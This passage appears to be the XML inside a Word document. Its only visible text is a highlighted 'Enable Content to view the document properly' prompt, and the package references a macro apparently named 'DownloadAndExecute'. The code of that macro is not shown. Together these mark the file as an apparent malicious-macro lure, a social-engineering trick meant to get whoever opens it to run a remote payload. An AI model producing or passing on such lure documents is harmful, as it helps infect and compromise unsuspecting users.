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CBB987" w14:textId="00915B0E" w:rsidR="00384A25" w:rsidRPr="00A846DB" w:rsidRDefault="00A846DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                              </w:t>
      </w:r>
      <w:r w:rsidRPr="00A846DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Enable Content to view the document properly</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00384A25" w:rsidRPr="00A846D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1F54"/>
    <w:rsid w:val="000E5B92"/>
    <w:rsid w:val="001856E0"/>
    <w:rsid w:val="001D7EDB"/>
    <w:rsid w:val="00257346"/>
    <w:rsid w:val="00316B81"/>
    <w:rsid w:val="00384A25"/>
    <w:rsid w:val="00490FBE"/>
    <w:rsid w:val="006E6F2F"/>
    <w:rsid w:val="00702C27"/>
    <w:rsid w:val="00A61F54"/>
    <w:rsid w:val="00A846DB"/>
    <w:rsid w:val="00B100AA"/>
    <w:rsid w:val="00FE1BE6"/>
    <w:rsid w:val="00FF05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C3497E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{75C3153A-E883-4B0B-9F2F-D27096AB58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61F5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61F5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61F5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61F5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61F5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61F5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61F5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61F5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61F5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61F5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61F5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61F5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61F5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1F5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61F5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61F5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61F5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61F5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61F5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61F5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1F5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61F5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61F5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61F5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61F5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61F5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61F5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61F5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61F5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WNLOADANDEXECUTE" wne:name="Project.ThisDocument.DownloadAnd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101</TotalTime>
  <Pages>1</Pages>
  <Words>11</Words>
  <Characters>64</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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Smith</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>user</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-10T19:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-12T07:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>